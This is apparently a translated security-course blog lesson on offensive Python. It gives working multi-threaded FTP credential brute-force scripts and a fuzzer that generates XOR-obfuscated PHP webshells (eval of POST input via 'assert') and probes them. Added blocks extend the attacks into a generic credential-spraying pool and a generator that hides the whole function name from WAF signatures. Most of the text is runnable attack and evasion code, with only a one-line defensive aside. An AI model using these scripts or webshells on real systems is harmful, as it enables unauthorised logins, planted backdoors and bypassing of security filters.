78: Python Development - Multi-threaded Fuzz & WAF XOR Evasion & Brute Force
阿新 • Published: 2021-08-19
Key points of this lesson:
- Using protocol modules, Requests-based crawling, simple multi-threading, encoding techniques, backdoor (webshell) bypass techniques
- Learning to use the rich standard modules to drive protocol connections (brute forcing, exploitation, etc.) and to combine them with Fuzz to get past a WAF
- Using the queue and threading modules
Case 2: Using the FTP module to implement a protocol brute-force script
- 1. Using the ftplib module
- 2. Iterating over the username and password dictionaries
- 3. Attempting to connect and judging success by executing a command
ftp_brute (single-threaded):

```python
# Author:Serena
import ftplib

# Simple simulated login test
# Brute force: IP, port, username dictionary, password dictionary
def ftp_brute():
    # Read both dictionaries once instead of re-opening the password file per user
    with open('ftp-user.txt') as uf:
        usernames = [u.strip() for u in uf if u.strip()]
    with open('ftp-pwd.txt') as pf:
        passwords = [p.strip() for p in pf if p.strip()]
    for username in usernames:
        for password in passwords:
            # print(username + '|' + password)
            # A fresh connection per attempt: servers drop the control
            # connection after a few failed logins, so reusing one object
            # would turn every later attempt into a failure
            ftp = ftplib.FTP()
            try:
                ftp.connect('192.168.56.110', 21, timeout=5)
                ftp.login(username, password)
                print(username + '|' + password + '| ok')
                # Once logged in we can list every file in the current FTP directory
                listing = ftp.retrlines('LIST')
                print(listing)
                ftp.quit()
            except ftplib.all_errors:
                pass
            finally:
                ftp.close()

if __name__ == '__main__':
    ftp_brute()
```

ftp_brute (multi-threaded):

```python
# Author:Serena
import ftplib
import sys
import queue
import threading

# Simple simulated login test
# Brute force: IP, port, username dictionary, password dictionary
def ftp_brute(ip, port):
    while not found.is_set():
        try:
            # get_nowait() instead of checking empty() first: with several threads
            # empty() can be False and the following get() then blocks forever
            cred = q.get_nowait()
        except queue.Empty:
            break
        username, password = cred.split('|', 1)
        ftp = ftplib.FTP()
        try:
            # Reconnect for every attempt: most FTP servers close the control
            # connection after a few failed logins, which would otherwise make
            # every later attempt on this thread a false "no"
            ftp.connect(ip, port, timeout=5)
            ftp.login(username, password)
            print(username + '|' + password + '| ok')
            # Once logged in we can list every file in the current FTP directory
            listing = ftp.retrlines('LIST')
            print(listing)
            found.set()  # valid credentials found: tell the other threads to stop
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
        finally:
            ftp.close()

if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()
    found = threading.Event()
    with open(userfile) as uf:
        usernames = [u.strip() for u in uf if u.strip()]
    with open(passfile) as pf:
        passwords = [p.strip() for p in pf if p.strip()]
    for username in usernames:
        for password in passwords:
            # print(username + '|' + password)
            q.put(username + '|' + password)
    threads = []
    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute, args=(ip, port))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
    # Run from the command line: python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
    # The "stop once the correct username/password is found" optimisation is the found Event above
```
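The queue/threading worker-pool pattern behind the script above, written here as an added example (it is not code from the original lesson) so that it can be run and checked without an FTP server: the login step is passed in as a function, a constructed in-memory stub plays the role of ftp.connect()+ftp.login(), and the pool stops all workers as soon as one of them gets a hit. The function names (spray, fake_ftp_login, demo), the wordlists and the "admin"/"ftp2021" pair are assumptions made for the demo. For real use, swap the stub for a function that opens a fresh ftplib.FTP() per attempt and returns False on ftplib.all_errors.

```python
import queue
import threading
from typing import Callable, Iterable, Optional, Tuple

Credential = Tuple[str, str]


def spray(
    usernames: Iterable[str],
    passwords: Iterable[str],
    try_login: Callable[[str, str], bool],
    threads: int = 10,
) -> Optional[Credential]:
    """Run try_login(username, password) over every combination on a pool of
    threads and return the first pair that succeeds, or None.

    try_login is assumed to open its own connection per call and to swallow
    protocol errors (for FTP: connect()+login() inside except ftplib.all_errors).
    """
    q: "queue.Queue[Credential]" = queue.Queue()
    for u in usernames:
        for p in passwords:
            q.put((u, p))

    found = threading.Event()   # set once any worker succeeds
    hit: list = []              # the winning pair is stored here
    lock = threading.Lock()

    def worker() -> None:
        while not found.is_set():
            try:
                # get_nowait() instead of the empty()/get() pair: with several
                # workers, empty() can be False and get() then block forever
                username, password = q.get_nowait()
            except queue.Empty:
                return
            if try_login(username, password):
                with lock:
                    if not hit:
                        hit.append((username, password))
                found.set()     # stop the other workers as soon as possible

    pool = [threading.Thread(target=worker, daemon=True) for _ in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
    return hit[0] if hit else None


def fake_ftp_login(valid: Credential, attempts: list, lock=None):
    """Constructed stand-in for ftp.connect()/ftp.login(): records every
    attempt and succeeds only for the `valid` pair (assumed test data)."""
    lock = lock or threading.Lock()

    def try_login(username: str, password: str) -> bool:
        with lock:
            attempts.append((username, password))
        return (username, password) == valid

    return try_login


def demo() -> Tuple[Optional[Credential], int]:
    """Spray a constructed 5x5 wordlist; returns (winning pair, attempts made)."""
    attempts: list = []
    checker = fake_ftp_login(("admin", "ftp2021"), attempts)
    users = ["anonymous", "ftp", "admin", "test", "root"]
    pwds = ["123456", "password", "ftp", "ftp2021", "admin"]
    result = spray(users, pwds, checker, threads=4)
    return result, len(attempts)


if __name__ == "__main__":
    print(demo())
```

Because workers exit as soon as the Event is set, the attempt count returned by demo() is usually well below the 25 combinations; with no valid pair in the list every combination is tried exactly once and None comes back.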
Case 3: Using Fuzz to build an AV/WAF-evading XOR shell script
- 1. How an XOR-evading shell works and how to develop one (reference examples: !^@, "^? etc.)
- 2. Generating a large number of payload variants in a Fuzz style, naming them in order and writing them into files under the web root
- 3. Using multi-threading to request every shell file in bulk and submit a test to see whether it connects and echoes output normally
Bypass:

```python
# Author:Serena
import time
import requests
import threading
import queue

def bypass_check():
    while True:
        try:
            filename = q.get_nowait()
        except queue.Empty:
            break
        url = "http://127.0.0.1:8081/x/" + filename
        # The generated shell reads its code from POST parameter x (no trailing
        # space: PHP would rename "x " to "x_" and the shell would never see it)
        datas = {'x': 'phpinfo();'}
        try:
            result = requests.post(url, data=datas, timeout=5).text
        except requests.RequestException:
            result = ''
        # "XIAODI-PC" is the hostname of the author's test machine; phpinfo()
        # output contains it only if the payload actually executed
        if "XIAODI-PC" in result:
            print('check ->' + filename + '->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)

if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1, 127):
        for ii in range(1, 127):
            # 'X'^'Y' in PHP is a byte-wise XOR; a pair that yields 'a'
            # (e.g. '!'^'@') makes the expression the string "assert" without
            # that word ever appearing in the file. Pairs containing ' or \
            # produce invalid PHP and are simply reported as "no" by the check.
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            # $_POST[x]: on PHP < 8 the bare x is treated as the string 'x'
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            # 'w' rather than 'a+': re-running must not append a second copy of the shell
            with open('D:/phpstudy/WWW/x/' + filename, 'w') as f:
                f.write(code)
    print("Fuzz files generated successfully")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()
```
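The XOR trick above can be computed offline instead of blindly writing 15,876 files and probing each one: PHP's string ^ string is a byte-wise XOR, so every pair of printable characters whose XOR is the wanted byte can be enumerated in Python, and the unusable ones (a bare ' or \ inside a single-quoted literal, or any letter/digit that would hand the WAF part of the word back) filtered out before anything touches the web root. The following is an added example, not code from the lesson, and it goes one step beyond the page's single-character 'a' by XOR-building the whole word, so the file contains no letter of "assert" at all. The names php_xor, xor_pairs, xor_word and build_shell are assumptions made here; the produced shell uses the same variable-function call as the page's payload and therefore assumes a PHP version where assert() still evaluates a string (PHP < 8).

```python
import itertools
import string

# Characters that cannot appear bare inside a PHP single-quoted string literal
PHP_SQ_UNSAFE = {"'", "\\"}
# Printable candidates allowed on either side of the ^ (whitespace excluded)
PRINTABLE = [c for c in string.printable if c not in string.whitespace]


def php_xor(a: str, b: str) -> str:
    """PHP's string ^ string: byte-wise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def xor_pairs(target: str, avoid_alnum: bool = True):
    """Every (x, y) of printable, single-quote-safe characters with x ^ y == target.

    avoid_alnum drops pairs containing a letter or digit, so a WAF signature on
    the word being rebuilt (e.g. 'assert') never sees any of its characters.
    """
    pairs = []
    for x, y in itertools.combinations(PRINTABLE, 2):
        if x in PHP_SQ_UNSAFE or y in PHP_SQ_UNSAFE:
            continue
        if avoid_alnum and (x.isalnum() or y.isalnum()):
            continue
        if php_xor(x, y) == target:
            pairs.append((x, y))
    return pairs


def xor_word(word: str, avoid_alnum: bool = True):
    """Two printable strings whose PHP XOR is `word`: the page's one-character
    trick generalised to the whole function name, one safe pair per byte."""
    left, right = [], []
    for ch in word:
        pairs = xor_pairs(ch, avoid_alnum)
        if not pairs:
            raise ValueError(f"no safe pair for {ch!r}")
        x, y = pairs[0]
        left.append(x)
        right.append(y)
    return "".join(left), "".join(right)


def build_shell(func: str = "assert", param: str = "x") -> str:
    """PHP one-liner of the form $a=('...'^'...');$a($_POST['x']);"""
    a, b = xor_word(func)
    if php_xor(a, b) != func:           # self-check before anything is written
        raise RuntimeError("XOR operands do not rebuild the function name")
    return f"<?php $a=('{a}'^'{b}');$a($_POST['{param}']);?>"


if __name__ == "__main__":
    print(xor_pairs("a"))       # the page's '!'^'@' is the first of these
    print(build_shell())
```

Writing the one resulting file (or the handful produced by iterating over xor_pairs) and sending the same phpinfo() probe as the script above replaces the brute-force pass; the defensive reading is the same function in reverse, since a scanner that evaluates 'x'^'y' expressions in PHP source with php_xor() sees the word the WAF regex missed.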
Resources:
- fuzzdb (https://github.com/zhanye/fuzzdb)
- fuzzDicts (https://github.com/stemmm/fuzzDicts)
- Webshell AV evasion and WAF bypass (https://www.cnblogs.com/liujizhou/p/11806497.html)
- Python ftplib module (https://www.cnblogs.com/kaituorensheng/p/4480512.html)
- PHP XOR (https://blog.csdn.net/qq_41617034/article/details/104441032)
- https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ, extraction code: xiao